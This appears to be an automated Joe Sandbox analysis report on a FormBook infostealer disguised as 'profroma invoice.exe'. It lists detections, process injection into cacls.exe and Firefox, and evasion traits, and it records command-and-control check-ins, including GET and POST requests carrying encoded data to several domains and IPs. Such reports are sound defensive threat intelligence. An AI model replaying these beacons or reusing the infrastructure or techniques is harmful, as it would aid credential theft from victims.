Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
profroma invoice.exe

Overview

General Information

Sample name:profroma invoice.exe
Analysis ID:1575109
MD5:17ea16c0677c90f27faddb659598f8f2
SHA1:4e57ad74ce9f950711417d49506d30fa105f8cf5
SHA256:97254f2e1720380e24069d4f7a8f274c8a2437e3c445c3ee228c54845a39b064
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • profroma invoice.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\profroma invoice.exe" MD5: 17EA16C0677C90F27FADDB659598F8F2)
    • profroma invoice.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\profroma invoice.exe" MD5: 17EA16C0677C90F27FADDB659598F8F2)
      • vEErKBMCpBGs.exe (PID: 3668 cmdline: "C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 4708 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • vEErKBMCpBGs.exe (PID: 3576 cmdline: "C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6540 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.profroma invoice.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.profroma invoice.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T13:57:48.287601+010020507451Malware Command and Control Activity Detected192.168.2.54987674.208.236.15680TCP
                2024-12-14T13:58:13.135481+010020507451Malware Command and Control Activity Detected192.168.2.54993784.32.84.3280TCP
                2024-12-14T13:58:27.974314+010020507451Malware Command and Control Activity Detected192.168.2.54997413.248.169.4880TCP
                2024-12-14T13:58:42.855703+010020507451Malware Command and Control Activity Detected192.168.2.54999366.29.149.4680TCP
                2024-12-14T13:59:05.599670+010020507451Malware Command and Control Activity Detected192.168.2.5499973.33.130.19080TCP
                2024-12-14T13:59:20.733238+010020507451Malware Command and Control Activity Detected192.168.2.550001129.226.153.8580TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: profroma invoice.exeVirustotal: Detection: 29%Perma Link
                Source: profroma invoice.exeReversingLabs: Detection: 60%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2808844558.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: profroma invoice.exeJoe Sandbox ML: detected
                Source: profroma invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: profroma invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: profroma invoice.exe, 00000004.00000002.2808373676.0000000001297000.00000004.00000020.00020000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000003.2743930343.0000000000935000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: profroma invoice.exe, 00000004.00000002.2808373676.0000000001297000.00000004.00000020.00020000.00000000.sdmp, vEErKBMCpBGs.exe, 00000006.00000003.2743930343.0000000000935000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vEErKBMCpBGs.exe, 00000006.00000002.3924116723.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3923999107.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: profroma invoice.exe, 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2808880817.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2811423115.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: profroma invoice.exe, profroma invoice.exe, 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2808880817.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2811423115.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0274C940 FindFirstFileW,FindNextFileW,FindClose,7_2_0274C940
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4x nop then jmp 080C0C5Fh0_2_080C06A3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h7_2_02739E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then xor eax, eax7_2_02739E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then pop edi7_2_0273E4AE
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h7_2_02739E46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h7_2_030704BE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49876 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49974 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49937 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49997 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49993 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50001 -> 129.226.153.85:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aktmarket.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raea/?OP=QXZPwDNH0BG0ttd0&OVldGJw=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0C3nDuO5nIZe3j/YTX68cDZNSzr/FZo0tHiTVt9ne+/WzA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?OVldGJw=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4ErYfnV+9J0MgDDdNAn16OZJz59DY9WPzssUTDurce1bk1g==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wb7v/?OVldGJw=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPYotf4JfrOn9OzIPvHr8twMpt9nvqMMqsQkOmIpHnfRVOQ==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?OVldGJw=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z7RTC1iZ1X4n/KUn3ZXo+XObiNOSg7uRc4jNKlD6GoMPhtg==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rbqc/?OVldGJw=3OhzIPQDpE/WyOq7Ap5YzcvodMsyqKhwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rlu95wMgHAHM1mSs1zJwZJ5t13zgPyFY5h6K1xMGitp/XiNQ==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pfw9/?OVldGJw=45l5W170mEENNSUkva5u0oLDjn7a85Be/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZDC0jYAJATZz8bqUDD2VUfBcYMm5ScOmty60G6hY6HDPa2g==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.techmiseajour.net
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
                Source: global trafficDNS traffic detected: DNS query: www.iglpg.online
                Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 4f 56 6c 64 47 4a 77 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 6c 71 72 77 70 58 34 65 63 42 69 32 72 38 6b 53 32 79 66 65 71 70 71 35 63 52 6a 62 53 6b 61 4d 67 34 50 59 31 38 3d Data Ascii: OVldGJw=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUilqrwpX4ecBi2r8kS2yfeqpq5cRjbSkaMg4PY18=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sat, 14 Dec 2024 12:57:48 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:58:34 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:58:37 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:58:39 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 